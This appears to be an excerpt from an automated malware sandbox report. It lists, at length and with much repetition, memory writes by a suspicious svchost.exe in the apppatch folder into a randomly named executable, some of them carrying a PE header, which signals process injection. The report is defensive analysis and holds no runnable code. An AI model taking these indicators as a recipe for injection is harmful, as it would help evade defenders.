Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 712000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1592000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1142000 value starts with: 4D5AJump to behavior
Writes to foreign memory regions
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1200000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1201000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1202000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1252000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1320000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1321000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1322000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1372000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 3070000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 3071000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 3072000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 30C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2F60000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2F61000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2F62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2FB2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2B50000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2B51000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2B52000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2BA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 13A0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 13A1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 13A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 13F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2A50000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2A51000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2A52000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2AA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E70000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E71000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E72000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: EC2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1010000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1011000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1012000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1062000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2AB0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2AB1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2AB2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2B02000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 26B0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 26B1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 26B2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2702000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F10000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F11000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2C00000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2C01000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2C02000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2C52000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2AF0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2AF1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2AF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2B42000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 6E0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 6E1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 6E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 732000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F10000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F11000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2B50000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2B51000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2B52000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2BA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 12D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 12D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 12D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1322000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2F90000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2F91000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2F92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2FE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 780000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 781000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 782000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 7D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: CA0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: CA1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: CA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: CF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2980000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2981000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2982000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 29D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2410000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2411000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2412000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2462000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1030000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1031000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1032000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1082000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 870000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 871000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 872000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 8C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E60000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E61000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: EB2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1010000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1011000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1012000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1062000Jump to behavior
